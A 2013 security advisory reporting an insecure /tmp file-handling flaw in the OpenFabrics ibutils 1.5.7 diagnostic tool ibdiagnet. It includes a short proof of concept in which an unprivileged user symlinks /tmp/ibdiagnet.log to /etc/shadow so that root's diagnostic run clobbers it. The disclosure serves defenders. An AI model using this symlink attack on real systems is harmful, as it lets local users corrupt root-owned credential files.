SecurityvulnsSECURITYVULNS:DOC:29245OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
3/6/2013
Larry W. Cashdollar
@_larry0
The infiniband diagnostic utiltiy handles files in /tmp insecurely. A malicious user can clobber root owned files with common symlink attacks.
http://www.openfabrics.org/downloads/ibutils/
[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow [nobody@exdb01 tmp]$
The following files are created, I imagine anyone of them can be used.
[root@exdb01 tmp]# ls -l /tmp/ibdiagnet* -rw-r–r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db -rw-r–r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs -rw-r–r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log -rw-r–r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log -rw-r–r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst -rw-r–r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs -rw-r–r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey -rw-r–r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl -rw-r–r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl -rw-r–r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
After root runs a diagnostic command:
[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7 -W- Topology file is not specified.
Reports regarding cluster links will use direct routes. Loading IBDM from: /usr/lib64/ibdm1.5.7 -W- A few ports of local device are up.
Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering … 7 nodes (2 Switches & 5 CA-s) discovered. .